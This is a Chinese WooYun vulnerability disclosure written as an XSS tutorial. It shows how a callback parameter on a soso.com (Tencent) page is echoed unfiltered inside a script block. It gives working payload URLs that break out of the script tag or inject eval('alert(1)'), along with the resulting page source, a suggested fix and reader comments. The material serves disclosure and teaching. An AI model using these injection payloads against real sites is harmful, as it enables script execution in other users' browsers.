漏洞概要 关注数(59) 关注此漏洞

缺陷编号: WooYun-2012-15959

漏洞标题: [腾讯实例教程] 那些年我们一起学XSS - 2. 输出在<script></script>之间的情况

相关厂商: 腾讯

漏洞作者: 心伤的瘦子

提交时间: 2012-12-13 14:49

公开时间: 2013-01-27 14:50

漏洞类型: xss跨站脚本攻击

危害等级: 低

自评Rank: 1

漏洞状态: 厂商已经确认

Tags标签: 反射型xss

9人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-13: 细节已通知厂商并且等待厂商处理中
2012-12-13: 厂商已经确认,细节仅向厂商公开
2012-12-23: 细节向核心白帽子及相关领域专家公开
2013-01-02: 细节向普通白帽子公开
2013-01-12: 细节向实习白帽子公开
2013-01-27: 细节向公众公开

简要描述:

接着上面一个教程,我们继续。这个例子属于第一例的特殊情况,当然也有特殊解法。也属于非常常见的一种情况。

详细说明:

1. 我们找到这么一个点,也是输入和输出都未过滤的一个点。相比教程第一例,其特殊之处在于,是输出在了 <script>[输出]</script>之间。



http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa





如下图:callback参数未做过滤。 在【查看源代码】下,我们可以看到。



picture\4_5.jpg





缺陷网页源代码:



<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}</script>





2. 碰到这种情况,我们一般有以下解法。



2.1 首先判断,是否过滤了 < , > , / 等符号,

2.2 如果都没有过滤,恭喜你,一般可以直接XSS了。代码如下:



http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa</script><script>alert(1)</script>



原理入下图:



picture\7_6.jpg





构造callback参数后的源代码



<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaaaaaaaa</script><script>alert(1)</script>(_ret);}catch(err){aaaaaaaaa</script><script>alert(1)</script>(_ret);}</script>





2.3 如果过滤了 <, >,那么就无法使用上面的办法了。我们接着看 3



3. script代码里的构造。



友情提示:这里可能需要一点点 javascript 的知识才行哦~~



我们可以如下构造:



http://activity.soso.com/common/setParentsInfo.php?callback=eval('alert(1)');void





可以看到,源代码是下面的样子。



picture\10_7.jpg





也就是说,我们插入的内容,使得这一段javascript依然【语法正确】,能够【正确执行】,并且能够执行【我们所插入的JS代码】,这样我们的目的就达到了。



构造后的源代码如下:



<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.eval('alert(1)');void(_ret);}catch(err){eval('alert(1)');void(_ret);}</script>





4. 这种输出在JS代码里的情况十分常见,但是呢?不幸的是,像这样没过滤的情况,却不是很常见。例如:



var a="[输出]"; // 通常程序员会把 " 过滤掉, 这样的话,一般来说,我们就很难构造。





但是,这并不是说,就一定是不能利用,后面我们会拿腾讯一些【比较有意思】的例子,来进一步说到 这个【输出在js里】的情况的~





漏洞证明:

见详情。

修复方案:

这类XSS的模型通常是:



<script>...[输出]...</script>

<style>...[输出]...</script>



解决方案:



1. 过滤 </xxx> 组合

2. 针对输出在不同的场景,进行合适的过滤。

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-13 16:03

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评论

  1. 2012-12-13 14:55 | xsser (核心白帽子 | Rank:249 漏洞数:17 | Live free or Die!)
    0

    腾讯是要齐吧

  2. 2012-12-13 14:58 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    靠!这也太假了~~心伤的胖子—心伤的瘦子,这货减肥了。。

  3. 2012-12-13 15:05 | momo ( 普通白帽子 | Rank:43 漏洞数:11 )
    0

    支持套装教程,到时好给乌云(@xsser)出书用或者出杂志用。@xsser 你说呢?

  4. 2012-12-13 15:21 | Rookie ( 普通白帽子 | Rank:201 漏洞数:40 )
    0

    减肥成功了 估计要连载 不管你们信不信 反正我信了

  5. 2012-12-13 15:23 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    @Rookie 看这架势指定要连载,这厮肯定在计划着情人节礼物。。(TX打包送妹纸)

  6. 2012-12-13 15:39 | dyun ( 实习白帽子 | Rank:75 漏洞数:12 )
    0

    @@~~~~

  7. 2012-12-13 15:46 | xsser (核心白帽子 | Rank:249 漏洞数:17 | Live free or Die!)
    0

    这瘦子要拿这个月的大奖啊?

  8. 2012-12-13 16:39 | 冷静 ( 实习白帽子 | Rank:3 漏洞数:2 )
    0

    @xsser 洞主叫我问奥迪还是ipad

  9. 2012-12-13 16:59 | momo ( 普通白帽子 | Rank:43 漏洞数:11 )
    0

    @冷静 是爱帕的or爱疯or百度U盘

  10. 2013-01-09 19:17 | 小石头 ( 实习白帽子 | Rank:8 漏洞数:2 | 行千里路,读万卷书,布衣亦可傲王侯。)
    0

    我擦 这个系列牛逼 出书提前预定啊